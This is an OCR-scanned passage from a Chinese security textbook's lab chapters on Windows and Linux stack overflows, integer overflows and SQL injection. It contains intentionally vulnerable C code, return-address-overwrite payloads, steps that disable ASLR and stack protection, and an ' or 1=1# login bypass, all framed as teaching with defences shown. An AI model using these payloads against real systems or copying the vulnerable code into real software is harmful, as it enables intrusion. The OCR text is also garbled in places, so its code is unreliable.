这 种 方法 有 效 地 阻止 了 很 多 缓冲 区 溢出 的 攻击 ,但 是 攻击 者 并 不 一 定 要 植 入 攻击 代 
码 来 实现 缓冲 区 溢出 的 攻击 ,所 以 这 种 方法 还 是 存在 很 多 弱点 的 。 

3. 利用 编译 器 的 边界 检查 来 实现 缓冲 区 的 保护 

这 个 方法 使 得 缓冲 区 溢出 不 可 能 出 现 ,从 而 完全 消除 了 缓冲 区 溢出 的 威胁 ,但 是 相对 
而 言 代价 比较 大 。 

4. 在 程序 指针 失效 前 进行 完整 性 检查 

虽然 这 种 方法 不 能 使 得 所 有 的 缓冲 区 溢出 失效 ,但 它 的 确 阻止 了 绝 大 多 数 的 缓冲 区 


10.2.3 其 他 溢出 方式 
除了 常见 的 缓冲 区 溢出 外 ,还 有 整数 溢出 漏洞 。 在 数学 概念 里 ,整数 指 的 是 没有 小 数 


“а 
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部 分 的 实数 变量 ,而 在 计算 机 中 ,整数 包括 长 整 型 . 整 型 和 短 整 型 ,其 中 每 一 类 又 分 为 有 符 
号 和 无 符号 两 种 类 型 。 如 果 程 序 没有 正确 处 理 整 数 的 表达 范围 .符号 或 者 运算 结果 时 ,就 
会 发 生 整数 溢出 问题 ,整数 溢出 一 般 又 分 为 三 种 。 

1. 宽度 溢出 

由 于 整数 型 都 有 一 个 固定 的 长 度 ,其 最 大 值 是 固定 的 ,如 果 该 整 型 变量 尝试 存储 一 个 
大 于 这 个 最 大 值 的 数 ,将 会 导致 高 位 被 截断 ,引起 整 型 宽度 溢出 。 

2. 符号 溢出 

有 符号 数 和 无 符号 数 在 存储 的 时 候 是 没有 区 别 的 ,如 果 程 序 没 有 正确 处 理 有 符号 数 
和 无 符号 数 之 间 的 关系 ,例如 将 有 符号 数 当 作 无 符号 数 对 待 .或 者 将 无 符号 数 当 作 有 符号 
数 对 待 时 ,就 会 导致 程序 理解 错误 ,引起 整 型 符号 溢出 问题 。 

з. 运算 溢出 

整数 在 运算 过 程 中 常常 发 生 进位 ,如 果 程 序 忽 略 了 进位 ,就 会 导致 运算 结果 不 正确 ， 
引起 整 型 运算 溢出 问题 。 

整数 溢出 是 一 种 难以 杜绝 的 漏洞 形式 ,其 大 量 存在 于 软件 中 。 要 防范 该 溢出 问题 除 
了 注意 正确 编程 外 ,还 需要 借助 代码 审核 工具 来 发 现 问题 。 另 外 整 型 溢出 本 身 并 不 会 带 
来 危害 ,只 有 当 错误 的 结果 被 用 到 了 如 字符 串 复制 .内 存 复制 等 操作 中 才 会 导致 严重 的 栈 
溢出 等 问题 ,因此 也 可 以 从 防范 栈 溢出 、 堆 溢出 的 角度 进行 防御 。 


10.3 Windows 下 的 缓冲 区 溢出 攻击 与 防护 实验 


10.3.1 实验 目的 


理解 Windows 下 缓冲 区 溢出 攻击 和 防护 的 基本 原理 ; 初步 掌握 二 进 制程 序 缓冲 区 
溢出 漏洞 的 分 析 和 利用 方法 ; 初步 掌握 Windows 缓冲 区 溢出 漏洞 的 防护 技术 。 


10.3.2 实验 内 容 及 环境 


1. 实验 内 容 

通过 Ollydbg 分 析 二 进 制 程序 的 缓冲 区 溢出 攻击 漏洞 并 利用 。 
2. 实验 环境 

。 操作 系统 : Windows XP 32 位 ; 

。 编译 环境 : Visual C++ 6.0; 

。 动态 调试 工具 : Ollydbg; 

。 16 进 制 文本 编辑 器 : Notepad 十 十 。 


10.3.3 实验 步骤 


1. 安装 编译 环境 并 编写 有 缓冲 区 溢出 漏洞 的 程序 
在 Windows XP 32 位 的 计算 机 上 安装 Visual C++ 6. 0, 新 建 一 个 Win32 console 
application, 并 新 建 一 个 main. c 文件 ,输入 如 下 代码 : 
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# include < string. h> 
void callCmd() 


{ 
printf ("welcome admin !\n"); 
systen("cnd") ; 

} 

void main() 

{ 


char buf[10]; 
printf("Enter passport 
gets(buf); 
if(!strcmp(buf, "admin")) 
callCmd(); 
printf("Access deny ! Wn"); 


) 


将 代码 编译 成 可 执行 程序 后 ,运行 该 程序 。 输 入 admin 后 提示 “welcome admin!" , 
并 弹出 新 的 命令 行 控制 台 , 输 入 其 他 字符 串 则 显示 “Access deny !”, 如 图 10. 2 所 示 。 


C: \sre\stackOverf lowNsof\Debug>sof .exe 
[Enter passport:adnin 

velcome admin * 

icrosoft Windows XP [版 本 5.1.2600] 
cO 版权 所 有 1985-2001 Microsoft Corp. 


"c NstackOverf louNsof NDebug?sof .exe 


: Ns rc NstackOverf low\sof NDebug? 


图 10.2 № 


2. 使 用 Ollydbg 动态 调试 程序 ,找到 溢出 点 
使 用 Ollydbg 打开 刚才 编译 得 到 的 可 执行 程 
设置 断 点 ,如 图 10. 3 所 示 。 


,找到 main 函数 入 口 点 00401080 ,并 


BBEC 

ВЗЕС АС 

53 

56 

57 edi 

8D7D Bh edi,[10cal.19] 
во 13000000 

B8 1 

F3 e 
68 54504200 offset sof.?? CQ ÜBRGEIBLGEnter?Sp|rRrgi = 00425054 ASCII "Enter passport:" 
Ж АЛШ. sof .printfgvdbgnnd blockeressges rintFgvdbgnnd_blockeressge 


图 10.3 在 main 函数 入 口 点 设置 断 点 


找到 callCmd 函数 的 入 口 点 00401020 ,并 设置 断 点 ,如 图 10.4 所 示 。 


ebp 
ebp,esp 
Sp, 0x40 


edi,[1ocal.16] 
T 


: stos duord p 
20584208 offset 5оЕ.??_СӘ_ӨВСӘНЕС1Әше1соте?!гйгд1 = 00425620 ASCII “welcome admin tN 
ЕВ 0Е010000 | Ш sof .printfgvdbgnnd_blockeressges fgudbgni blo е 
83Ch 0h add esp, 0x4 
ЖЕТИП offset sof.?? СӨ 830KJLGcnd?$8nGio 0042501С ASCII Sd 


图 10.4 在 callCmd 函数 的 入口 点 设置 断 点 
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单 击 F9 键 运行 该 程序 ,到 达 main 函数 入 口 点 后 使 用 FS 键 单 步 运行 程序 ,弹出 
图 10. 5 中 的 提示 信息 “Enterpassport:”, 输 入 "AAAAAAAA”, 继 续 单 步 执行 程序 。 


алала 
С | ЕВ C2020009 ESIE sof.getsldivearestringhck_from бра сосет] 


reVstackOverfli 


图 10.5 程序 运行 要 求 用 户 输入 


当 指令 执行 到 strcmp 处 时 ,查看 寄存 器 (register) 的 内 容 , 获 得 ESP = 0012FF20. lll 


图 10.6 所 示 。 


admin’ 


~ B3EC AC 
п “adain 


вото Bà 
ЖОЕ 
28880 


2FF88 


& Soma lBLeEnter ?5p| [Arg 
intfqdbgnnd blockeressges 


. 68 54504200 
ЕВ 7Е010000 


s 0023 BCFFFFFFFF) 
5 0018 W(FFFFFFFF) 

0023 32bit OQ(FFFFFFFF) 
IT WFFFFFFFF) 
S 963B 32bit 7FFDFOBUFFF) 
GS 0000 NULL 


Argi 
ringück Fri 


LastErr ERROR SUCCESS (00009000 


图 10.6 查看 寄存 器 信息 


在 Ollydbg 的 右 下 角 内 存 查 看 区 找到 0012FF20 地 址 ,并 向 下 寻找 字符 串 “AAAAAAAA” 


出 现 的 地 方 (图 10.7 中 内 存 0012FF74 处 ) ,继续 向 下 寻找 函数 的 返回 地 址 ,图 10. 7 中 显 


示 为 0012FF84。 计 算出 0012FF84 一 0012FF74 王 16。 


9612FF78 “CCCCCCCC 
8012FF7^ ~ 41414141 
Lap] NOLLET 
8012FF7C - CCCCCCO8 
9612FF88 8012FFC8 
0012FF84 00401529 


图 10.7 查看 寄存 器 信息 


如 图 10. 8 所 示 ,打开 UltraEdit 后 . 单 击 Ctrl 十 h 键 切换 为 16 进 制 编辑 模式 ,输入 刚 
才 找 到 的 callCmd 函数 的 入 口 地 址 00401020。 


O00000000h: IEEE 20 20 20 20 20 20 


图 10.8 查看 寄存 器 信息 
通过 分 析 得 知 ,输入 任意 16 个 字 节 长 度 的 字符 串 后 就 可 以 使 用 cmdCall 的 返回 地 址 


覆盖 原来 的 返回 地 址 ,使 得 执行 过 程 跳 转 到 cmdCall 函数 中 。 
如 图 10. 9 所 示 , 运 行 可 执行 程序 ,提示 “Enterpassport:” 后 输入 *AAAAAAAAAAAAAAAA 


@”, 显 示 “welcome admin1”, 并 弹出 命令 行 控制 台 ,攻击 成 功 。 
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:Nsrc\stackOverf loussof NDebug?sof -exe 
ssport :AAAAAAAAAAAAAAAA ^PR 


icrosoft Windows XP [版 本 5.1.26001 


Cc》 版 权 所 有 Microsoft Corp. 


图 10.9 缓冲 区 溢出 攻击 成 功 
3. 缓冲 区 溢出 漏洞 的 弥补 
将 main. c 的 源 代码 修改 如 下 : 


# include < string. h> 
void callCnd() 


{ 
printf ("welcome admin !\n"); 
systen("cnd") ; 
} 
void main() 
{ 
char buf[10]; 
printf("Enter passport:"); 
gets(buf); 
if (strlen(buf) > 8) { // 字 符 串 比较 前 先 计算 字符 串 长 度 是 否 符合 要 求 
printf("Access deny !\п"); 
return; 
) 


else if(!strcmp(buf, "admin")) 
callCmd(); 
else 
printf("Access deny ! An"); 


} 
重复 第 1 步 和 第 2 步 的 过 程 ,尝试 后 发 现 进行 缓冲 区 溢出 攻击 无 法 成 功 。 


10.4 Linux 下 的 缓冲 区 溢出 攻击 与 防护 实验 


10.4.1 实验 目的 


通过 实验 理解 Linux 下 缓冲 区 溢出 攻击 和 防护 的 基本 原理 ,初步 掌握 二 进 制 程序 组 
冲 区 溢出 漏洞 的 分 析 方 法 ,会 编写 简单 的 shellcode, 利 用 缓冲 区 溢出 漏洞 进行 攻击 。 初 
步 掌 握 Linux 缓冲 区 溢出 漏洞 的 防护 技术 。 
10.4.2 实验 内 容 及 环境 


1. 实验 内 容 
编写 缓冲 区 溢出 攻击 程序 ,并 攻击 获得 root 权限 的 shell, 
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2. 实验 环境 
操作 系统 : ubuntu Linux 64 位 ; 
编译 环境 : gcc4.9 以 上 。 


10.4.3 实验 步骤 


1. 编译 环境 搭建 
由 于 使 用 的 是 64 位 的 Ubuntu Linux, 需 要 安装 一 些 兼 容 32 位 开发 和 调试 的 库 。 使 
用 如 下 命令 安装 : 


sudo apt – get install lib32ncurses5 
sudo apt - get install lib32z1 


输入 命令 “linux32” 进 入 32 位 Linux 环境 。 此 时 你 会 发 现 , 命 令 行 不 能 tab 补 全 了 ， 
可 以 通过 输入 “*/bin/bash” 使 用 bash. 

2. 初始 设置 

Ubuntu 和 其 他 一 些 Linux 系统 中 ,使 用 地 址 空间 随机 化 来 随机 堆 Cheap) 和 栈 
(Cstack) 的 初始 地 址 ,这 使 得 猜测 准确 的 内 存 地 址 变 得 十 分 困难 ,而 猜测 内 存 地 址 是 缓冲 
区 溢出 攻击 的 关键 。 因 此 本 次 实验 中 ,我 们 使 用 以 下 命令 关闭 这 一 功能 : 


sudo sysctl - w kernel.randomize va ѕрасе = 0 


此 外 ,为 了 进一步 防范 缓冲 区 溢出 攻击 及 其 他 利用 shell 程序 的 攻击 ,许多 shell 程序 
在 被 调用 时 自动 放弃 它们 的 特权 。 因 此 ,即使 你 能 欺骗 一 个 Set-UID 程序 调用 一 个 
shell, 也 不 能 在 这 个 shell 中 保持 root 权限 ,这 个 防护 措施 在 /bin/bash 中 实现 。 

Linux 系统 中 ,/bin/sh 实际 是 指向 /bin/bash 或 /bin/dash 的 一 个 符号 链接 。 为 了 重 
现 这 一 防护 措施 被 实现 之 前 的 情形 ,我们 使 用 另 一 个 shell 程序 (zsh) 代 替 /bin/bash。 下 
面 的 指令 描述 了 如 何 设置 zsh 程序 : 


sudo su 

cd /bin 

rm sh 

ln -s zsh sh( 如 果 系 统 没有 zsh, 先 用 sudo apt - get install zsh 安装 ) 
exit 


3. 编写 和 编译 程序 
把 以 下 代码 保存 为 “test. ce” 文件 ,保存 到 /tmp 目录 下 。 代 码 如 下 : 


# include < stdio. h> 
# include < string. h> 
void hello() 
{ 
printf("helloWin"); 
) 
int fun(char * str) 
{ 
char buf[10]; 
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strcpy(buf, str); 
printf(" $ s\n", buf); 


return 0; 
) 
int main(int argc, char * * argv) 
{ 
inti-0; 
char * str; 
str = argv[1]; 
fun(str); 
return 0; 
} 


使 用 如 下 命令 编译 该 程序 : 
gcc -m32 -g - fno- stack- protector - о test test.c 


由 于 使 用 的 是 64 位 的 ubuntu Linux 作为 实验 环境 ,需要 使 用 -m32 编译 选项 将 源 代 
码 编译 为 32 位 程序 ,使 用 -g 选项 使 可 执行 程序 支持 gdb 多 种 调试 选项 ,使 用 -fno-stack- 
protector 关闭 gcc 编译 程序 的 堆栈 保护 。 

4. 使 用 gdb 动态 分 析 程 序 

先 使 用 “gdb test” 命 令 启 动 对 test 程序 的 动态 调试 。 分 别 运 行 “disass hello”*disass 
fun"*disass main”, 获 得 3 个 函数 的 汇编 代码 及 内 存 中 的 地 址 。 如 图 10. 10 所 示 ,获得 的 
hello 函数 的 首 地 址 是 0x0804843b, 还 有 main 函数 中 调用 fun 函数 时 call 的 地 址 是 
0x080484ab.call 的 下 面 一 条 指令 的 地 址 是 0x080484b0。 这 些 都 是 放 在 寄存 器 EIP 里 
的 ,等 缓冲 区 溢出 的 时 候 , 会 用 到 0x080484b0。 


(gdb) disass hello 
Dump of assembler code for function hello: 


0x0804843b push %ebp 
6x6804843c mov — Xesp,Xebp 
6x0804843e sub S$0x8,Xesp. 
0x08048441 sub — Sexc,Xesp 
6x68048444 push $0x8048540 
Ox08048449 call Өх8048310 <putseptt> 
0x0804844e add $0x10,%esp 
0x08048451 nop 
0x08048452 leave 
0x08048453 <+24>: ret 
End of assembler dump. 
(gdb) disass main 
Dump of assembler code for function main: 
0x08048482 : lea 0x4(%esp),%ecx 
6x68048486 and — Sexfffffffo,Xesp 
(gdb) disass fun 6x68048489 pushl -ex4(Xecx) 
Dump of assembler code for function fun: 6x6804848c push — Xebp 
0x08048454 <+0>: push —Xebp 6x6804848d mov — Xesp,Xebp 
ӨхӨВ048455 <+1>: mov — Xesp,Xebp 6x6804848f push — Xecx 
0x08048457 <+3>: sub $0x18,Xesp 6x08048490 sub $0x14,Xesp 
9х0804845а SOx8,%esp 0х08048493 <+17>: mov Xecx,Xeax 
6x6864845d Ox8(Xebp) 0хӨ8048495 <+19>: movl —S0x0,-Oxc(Xebp) 
0x08048466 -Ox12(%ebp) ,Xeax 6x0804849c <+26>: том Ox4(Xeax),Xeax 
0x08048463 Xeax 6x6804849f ««29»: mov ^ Ox4(Xeax),Xeax 
0x08048464 0x8048300 «strcpygplt» 0x080484a2 <+32>: mov — Xeax,-Ox10(Xebp) 
9х08048469 50х10,%еѕр 8x080484a5 <+35>: sub S8xc,Xesp 
0x0804846c Sexc ,Xesp 6x680484a8 ««38»: pushl -0x10(%ebp) 
0x0804846f -Ox12(%ebp) ,Xeax 6x080484ab ««41»: call 6x8648454 cfun» 
0x08048472 Xeax 0x080484b0 <+46>: add $0x10,%esp 
6x08048473 6x8648316 «putsgplt» 6x680484b3 <+49>: mov $0x0,%eax 
0x08048478 50х10 ,Хеѕр Ox680484bB <+54>: тоу -Өха(хер),хесх 
өхөвө4847ь 50хө ,Хеах 0x080484bb <+57>: leave 
0x08048486 6x080484bc ««58»: lea — -Ox4(Xecx),Xesp 
6x08648481 8x080484bf <+61>: ret 
End of assembler dump. End of assembler dump. 


图 10.10 hello, fun 和 main 函数 反 汇 编 代 码 
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如 图 10. 11 所 示 ,使 用 “1” 命 令 列 出 源 代码 ,并 分 别 在 源 代码 第 12 行 和 第 21 行 设置 


断 点 。 
(gdb) 1 
4 
5 printf("helloin"); 
6 
7 
8 int fun(char *str) 
9 { 
10 char buf[16]; 
11 strcpy(buf, str); 
12 printf("XsYn", buf); 
13 return 8; 
(gdb) 1 
14 
15 
16 int main(int argc, char **argv) 
17 { 
18 int i=0; 
19 char *str; 
20 str=argv[1]; 
21 fun(str); 
22 return Ө; 
23 } 
(gdb) b 12 
Breakpoint 1 at 0x80484dd: file test.c, line 12. 
(gdb) b 21 


Breakpoint 2 at 0х8048527: file test.c, line 21. 
图 10.11 列 出 源 代 码 并 设置 断 点 


现在 输入 "r AAAAAAAA” 指 令 来 运行 ,可 以 看 到 程序 在 第 21 行 停 下 了 ,使 用 “x/8x 
$ esp” 指 令 查看 堆栈 内 容 , 如 图 10. 12 所 示 。 


(gdb) r AAAAAAAA 
Starting program: /home/test/workdir/src/test4/test AAAAAAAA 


Breakpoint 2, main (argc=2, argv-Oxffffd054) at test.c:21 


21 fun(str); 

(gdb) x/8x Sesp 

Oxffffcf90: 0x00000002 exffffdos4 exffffd259 6x00000000 
Oxffffcfao: Oxf7fb93dc exffffcfco 0x00000000 0xf7e21637 


图 10.12 运行 程序 到 断 点 处 的 效果 


使 用 “n” 指 令 继 续 运行 程序 到 下 一 个 断 点 ,可 以 看 到 程序 在 第 12 行 停 下 了 ,使 用 
"x/8x $$esp? 指 令 查看 堆栈 内 容 , 如 图 10. 13 所 示 。 


(gdb) п 

Breakpoint 1, fun (str-Oxffffd259 "AAAAAAAA") at test.c:12 

12 printf("XsYn", buf); 

(gdb) x/8x Sesp 

exffffcf60: Oxffffffff 0x4141002f 0x41414141 0х#7004141 
exffffcf70: 0x00008000 exf7fb9666 exffffcfa8 6x080484b6 


图 10. 13 运行 到 下 一 个 断 点 并 查看 堆栈 内 容 


可 以 看 到 ,8 个 A(ASCII 编码 为 0x41) E ЖЛ, callfun 指令 的 下 一 条 指令 
0x080484b0 也 已 经 压 人 栈 。 并 且 第 一 个 A 和 0x080484b0 指令 在 堆栈 中 相距 22 字 节 。 
退出 gdb 调试 ,重新 使 用 “gdb test” 命 令 开 始 调试 ,并 在 第 12 行 设 置 断 点 。 然 后 使 用 
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ШТ "r perl -e 'print "A"x22; rint "\x3b\x84\x04\ x08" "运行 ,如 图 10. 14 所 示 。 
(gdb) b 12 
Breakpoint 1 at Өхвө4846с: file test.c, line 12. 


(gdb) r "perl -e 'print "A"x22;print "|x3b|x84lx04|x08" 
Starting program: /home/test/workdir/src/test4/test "perl -e 'print "A"x22;print "\x3b\x84\x04\x08"' ` 


Breakpoint 1, fun (str-exffffdz00 *") at test.c:12 
printf("Xs|n", buf); 

ladb) x/8x $esp 

Bxffffcf56: exffffffff 0x4141002f 0x41414141 0x41414141 

Bxffffcf60; 0x41414141 0x41414141 0x41414141 0x0804843b 


图 10.14 使 用 特殊 输入 直接 运行 程序 


可 以 发 现 原来 存放 callfun 指令 的 下 一 条 指令 地 址 的 位 置 已 变 成 0x0804843b, 也 就 
к hello 函数 的 入口 地 址 ,说 明 主 函数 调用 fun 子 函 数 的 返回 地 址 覆盖 成 功 。 
运行 攻击 
sibi “. /test^ perl -e 'print " A"x22; print "A x3bVx84NV x04V x08" Z £3 f Лр. п 
发 现 输出 结果 中 除了 打印 出 AAAAAAAAAAAAAAAAAAAAAA 信息 外 ,也 打印 出 了 
hello ,说明 函 数 执行 到 了 hello 子 函 数 中 ,缓冲 区 溢出 攻击 成 功 ,如 图 10. 15 所 示 。 


Fr .[test ‘perl -e 'print "A"x22;print "\x3b\x84\x04\x08"'` 
;4| 
hello 


图 10.15 缓冲 区 溢出 攻击 成 功 


6. Linux 缓冲 区 溢出 攻击 防护 

1) 开启 地 址 空间 布局 随机 化 机 制 进行 防护 

通过 命令 “sudo sysctl -v kernel. randomize_va_space 王 2” 打开 系统 的 地 址 空间 随机 
化 机 制 ,重复 用 . /test perl -e 'print " A"x22; print "\x3b\x84\x04\ x08" ,观察 是 否 每 次 
都 可 以 攻击 成 功 。 

2) 开启 堆栈 保护 机 制 进行 防护 

重新 使 用 gee -m32 -g -o testtest. c 命令 编译 出 test 程序 后 ,重复 上 述 攻击 过 程 检验 
是 否 可 以 攻击 成 功 。 


10.5 整数 溢出 实验 


10.5.1 实验 目的 
掌握 整数 溢出 的 原理 ,了 解 宽度 溢出 和 符号 溢出 的 发 生 过 程 。 
10.5.2 实验 内 容 及 环境 


1. 实验 内 容 

使 用 VC6.0 的 源码 调试 功能 ,尝试 不 同 的 程序 输入 ,并 跟踪 变量 和 内 存 的 变化 ,以 观 
察 不 同 整 型 溢出 的 原理 。 

2. 实验 环境 


主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 和 VC6. 0。 
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10.5.3 实验 步骤 


1. 整 型 宽度 溢出 
1) 编译 源 程 序 
通过 VC6.0 将 以 下 代码 编译 成 debug 版 的 testl. ехе. 


1 int main(int argc,char * агду[]){ 
2 unsigned short s; 
3 int i; 

4 char buf[10]; 

5 i-atoi(argv[1]); 

6 5= i; 

Т if(s»-10)( 

8 printf(" 错 误 ! 输 入 不 能 超过 101 V"); 
9 return - 1; 

10 } 

11 memcpy( buf, argv[2], i); 

12 buf[i] = '\0'; 

13 printf(" % s\n", buf); 

14 return 0; 


2) 加 载 程序 
使 用 VC6. 0 调试 t1. exe, 选 择 “ 工 程 ”- 盖 设置 ?调试 ?选项 ,在 “程序 变量 "中 填 人 
“100 aaaaaaaaaaaaaaaa”, 如 图 10. 16 所 示 , 按 Ctrl 十 F5 组 合 键 运行 。 


Project Settings 


Settings For: |Win32 Debug - General Debug | CIC++ | Link | Resources | Bi 


& 29 
Category: E 


Executable for debug session: 
[Fate stl\Debug\Cpp1.exe 


Working directory: 


Program arguments: 


[100 аааааааааааааааа 7 


Remote executable path and file name: 


图 10. 16 调试 参数 设置 
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3) 检查 参数 
由 于 参数 i 的 值 大 于 10., 不 能 通过 第 7 行 的 条 件 判 断 . 程 序 运 行 显示 “错误 ! 输入 不 
能 超过 101” 后 退出 ,如 图 10. 17 所 示 。 


any key to continue 


图 10. 17 执行 程序 


4) 修改 参数 


修改 参数 i 的 值 为 65537, 并 在 第 6 行 设置 一 个 断 点 , 按 F5 键 运行 。 
5) 观察 运行 环境 


意 此 时 “i = 0x00010001 


程序 停 在 断 点 处 ,观察 VC6. 0 程序 运行 的 上 下 文 窗口 ,注意 
(65537)”, 如 图 10. 18 所 示 。 
E Context: [main(int, char * *] 可 
Name Value ] 
g argu[1] üx00538ea8 "65537" 
8x36 '6" 
buf[16] Bxce '? 
0x00010001 


5 xcccc 


图 10.18 ”调试 参数 信息 


6) 宽度 溢出 
Fk F10 键 单 步 运 行 ,注意 到 “s 二 0x0001”, 此 时 i 的 高 位 被 截断 了 ,发 生 了 整 型 宽度 溢 
出 ,如 图 10. 19 所 示 。 


E Context: [main(int, char * *] 了 


Name Value 
í 0x00010001 
5 0x0081 


Р 10.19 整形 宽度 溢出 
т) 缓冲 区 溢出 
由 于 s 的 值 小 于 10 ,通过 了 第 7 行 的 条 件 判断 ,进入 到 第 11 行 的 memcpy 函数 。 而 
复制 的 长 度 ;一 65537 又 远大 于 buf 缓冲 区 的 大 小 10, 导 致 缓冲 区 溢出 ,所 以 程序 提示 出 
Ж.Ш 10.20 所 示 。 
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Microsoft Visual С++ 


d) Unhandled exception in Cppl. exe: 0xC0000005: Access Violation. 


[we 2j 


图 10.20 发 生 缓冲 区 溢出 
2. 整 型 符号 溢出 


1) 编译 源 程 序 
通过 VC6.0 将 以 下 代码 编译 成 debug 版 的 test2. exe。 


1 int main(int argc,char * argv[]){ 

2 char kbuf[800]; 

3 int size = sizeof(kbuf); 

4 int len = atoi(argv[1]); 

5 if(len» size)( 

6 printf(" 错 误 ! 输 入 不 能 超过 8001 Vn") ; 

了 return 0; 

8 } 

9 memcpy(kbuf, argv[2], len); 

10 ) 

2) 调试 程序 

调试 test2. exe, 在 程序 参数 栏 中 填 人 “1000 aaaaaaaaaaaaaaaa”, 按 Ctrl 十 F5 组 合 键 
运行 。 


3) 检查 参数 

由 于 此 时 参数 i 的 值 为 1000, 大 于 限定 size 王 800, 所 以 不 能 通过 第 5 行 的 条 件 判断 ， 
程序 提示 “错误 ! 输入 不 能 超过 8001” 后 退出 。 

4) 修改 参数 

修改 参数 i 的 值 为 一 1, 在 第 5 行 设置 断 点 , 按 F5 键 运行 。 

5) 观察 运行 环境 

程序 停 在 断 点 处 ,观察 VC 6.0 程序 运行 的 上 下 文 窗口 ,注意 此 时 Теп = oxffffffff CH 
为 一 1) ,而 size 二 0x00000320, 如 图 10. 21 所 示 。 


E Context: [main(int, char * *} т 
Мате [Value 


18 агдо[1] 0x00439ea8 "-1" 


size 0x00000320 


图 10.21 调试 参数 信息 


6) 符号 溢出 

由 于 len 的 定义 是 有 符号 数 int, 所 以 此 时 len 王 一 1, 小 于 size 的 值 ,通过 第 5 行 条 件 
判断 ,执行 memcpy 函数 。 但 是 memepy 函数 的 第 三 个 参数 定义 为 无 符号 数 的 size t. Al 
而 会 将 len 作为 无 符号 数 对 待 ,由 此 发 生 整 型 符号 溢出 错误 。 此 时 len — Oxffffffff CHI 
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4294967295) ,远大 于 目的 缓冲 区 kbuf 的 值 800 ,继续 运行 会 发 生 错误 。 


10.6 练 J й 


CD 通过 查找 资料 获取 Windows 和 Linux 下 其 他 常用 的 缓冲 区 溢出 攻击 防护 方法 ， 
并 结合 10. 2 节 和 10. 3 节 的 实验 内 容 进 行 验证 。 

(2) 查找 资料 ,学 习 使 用 IDA Pro 反 汇 编 Linux 程序 代码 ,重新 进行 10. 3 节 的 实验 
内 容 , 并 比较 IDA Pro 和 gdb 反 汇 编 各 自 的 优点 。 


Web 应 用 攻击 与 防范 


11.1 Ж 述 


随 着 互联 网 相关 技术 的 飞速 发 展 , Web 应 用 凭借 其 交互 性 和 易 用 性 风靡 世界 ,典型 
的 Web 应 用 包括 网 络 购物 (如 淘宝 )、 搜 索引 擎 、 社 交 网 络 、 网 上 银行 、 微 博 等 。Web 应 用 
采用 浏览 器 /服务 器 (Browser/Server, B/S) 架构 ,通过 超 文本 传输 协议 (HyperText 
Transfer Protocol,HTTP) 或 以 安全 为 目标 的 НТТР 通道 (Hypertext Transfer Protocol 
over Secure SocketLayer, HTTPS) 协 议 提供 访问 。 典 型 的 Web 应 用 架构 如 图 11. 1 所 
示 , 包 括 客户 端 浏 览 器 、Web 服务 器 和 数据 库 服务 器 。 


TO a. 


浏览 器 Web 服 务 器 数据 库 服务 器 
图 11.1 Web 应 用 架构 


常见 的 Web 应 用 都 是 基于 模型 -视图 -控制 器 (MVC) 设 计 的 ,通常 由 表示 层 、 应 用 层 、 
数据 层 组 成 。 

表示 层 直接 与 用 户 进行 交互 ,获取 用 户 的 输入 并 验证 输入 的 合法 性 ,将 合法 用 户 输入 
传递 给 服务 器 端的 应 用 层 , 应 用 层 将 处 理 的 结果 返回 给 表示 层 , 客 户 端 浏览 器 以 HTML 
的 形式 显示 处 理 的 结果 。 

应 用 层 通常 也 被 称 为 业务 层 , 它 是 表示 层 和 数据 层 的 桥梁 ,位 于 Web 服务 器 端 , 它 处 
理 用 户 提交 上 来 的 请 求 ,调用 数据 层 的 接口 ,获取 数据 库 的 数据 ,产生 НТТР 的 响应 。 

数据 层 : Web 应 用 程序 通过 数据 层 与 数据 库 进行 交互 ,通过 SQL 语句 向 数据 库 提 交 
数据 处 理 请 求 , 查 询 、 更 新 、 删 除 ,修改 相关 数据 ,并 将 数据 处 理 结果 返回 给 Web 应 用 服务 
器 ,再 由 Web 应 用 服务 器 返回 给 客户 端 。 

由 于 Web 应 用 程序 的 开发 周期 较 短 ,开发 技术 更 新 换代 快 而 且 易 于 入 门 , 这 使 得 在 
开发 过 程 中 开发 人 员 的 安全 意识 相对 淡薄 ,对 安全 方面 的 重视 不 够 ,只 是 以 实现 功能 、 界 
面 美观 为 主要 目的 。 另 外 ,Web 应 用 程序 具有 开放 性 ,用 户 访问 量 很 大 ,加 大 了 被 攻击 的 
概率 。 全 球 顶 尖 的 Web 安全 研究 机 构 OWASP 组 织 总 结 的 Web 应 用 漏洞 已 有 上 百 种 之 
多 。 很 多 黑客 通过 Web 应 用 漏洞 窃取 金钱 、 隐 私 , 扰 乱 正 常 的 业务 执行 。 据 调查 显示 ,网 
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络 上 超过 70% 的 攻击 都 是 针对 Web 应 用 层 的 漏洞 , Web 应 用 攻击 带 来 的 危害 越 来 越 大 。 
本 章 简要 介绍 SQL 注入 攻击 、XSS(Cross-Site Scripting) 跨 站 脚本 攻击 ,文件 上 传 漏洞 攻 
击 和 路 站 脚本 伪造 (Cross-Site Request Forgery,CSRF) 四 种 常见 Web 攻击 的 基本 原理 ， 
并 通过 实验 展示 攻击 的 基本 过 程 和 危害 。 


11.2 Web 攻击 原理 


11.2.1 SQL 注 入 


SQL 注入 是 指 通 过 构建 特殊 的 输入 作为 参数 传人 Web 应 用 程序 ,最 终 达 到 欺骗 数 
据 库 服务 器 执行 恶意 SQL 命令 的 目的 ,下 面 是 一 段 存在 SQL 注入 漏洞 的 代码 片段 : 
sqlstring = "SELECT * FROM Users WHERE name = '" + strName + "'AND Password = '" + strPassword t "'" 
If GetQueryResult (sqlstring) = 0 Then 
bAuth = false 


Else 
bAuth = true 


该 段 代码 用 于 验证 用 户 身 份 , 如 果 用 户 输入 的 用 户 名 strName 和 密码 strPassword 
与 用 户 表 Users 中 的 某 条 记录 匹配 则 认证 成 功 , 否则 失败 。 假 设 用 户 输入 的 用 户 名 为 
Smith ,口令 为 123, 则 构成 的 SQL 查询 字符 串 sqlstring 为 SELECT * FROM Users 
WHERE Name = 'Smith' AND Password = '123'。 如 果 攻 击 者 设计 输入 的 用 户 名 为 
"ог 1=1#, 在 口令 为 空 的 情况 下 ,构成 的 SQL 查询 字符 串 sqlstring 为 SELECT * 
FROM Users WHERE Name= ''or 1= 1# ' AND Password = '',“#”{Е MySQL Ж 
据 库 中 为 注释 符 。 由 于 查询 条 件 永远 为 真 ,返回 的 查询 结果 中 一 定 有 记录 ,因而 身份 认证 
成 功 ,这 将 违背 原 有 程序 的 初衷 。 

SQL 注入 的 种 类 主要 有 以 下 几 种 。 

1. 重 言 式 攻击 (Tautology) 

上 述 例子 中 攻击 者 注入 代码 包含 了 一 个 重 言 式 ( 永 真 式 )1 二 1, 使 得 SQL 命令 语句 条 
件 子 句 部 分 恒 成 立 ,这 种 攻击 方式 称 为 重 言 式 攻击 ,一般 用 于 绕 过 认证 机 制 。 

